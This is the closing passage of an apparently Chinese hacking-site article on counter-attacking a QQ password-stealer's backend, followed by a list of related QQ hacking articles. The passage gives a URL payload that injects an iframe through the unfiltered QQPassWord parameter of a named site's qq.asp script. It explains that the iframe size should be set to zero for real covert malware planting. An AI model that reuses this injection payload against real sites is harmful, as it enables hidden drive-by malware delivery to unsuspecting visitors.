[组图]QQ盗号软件后门分析与反击图13 
再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...
如果想反挂马的话..我们就可以提交以下数据
| 以下是引用片段: http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=<iframe%20&# ... 20width=480%20height=480></iframe> |
图14
当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0
好了..现在我们就可以给作者一个惊喜去了..图15
| QQ盗号软件后门分析与反击 | 10-26 | |
| 你的QQ号和Q币是如何被盗的! | 10-15 | |
| QQ也来玩0day漏洞(杂志版带执行) | 09-01 | |
| QQ积分游戏漏洞!80个积分就能做 | 08-27 | |
| QQ 0day漏洞工具利用 | 08-17 | |
| QQ所有文件和目录详细分析 | 07-02 | |
| 选个好密码 黑客窃取QQ常用密码排 | 07-02 | |
| 腾讯QQ聊天窗口漏洞安全测试报告 | 06-18 | |
| 如何准确识别QQ盗号两大陷阱 | 06-05 | |
| 如何禁止他人上QQ!! | 06-02 | |
| 刷免费QQ空间VIP播放器 | 04-07 | |
| 让死保的QQ密码保护变活保 | 03-14 | |
您现在的位置: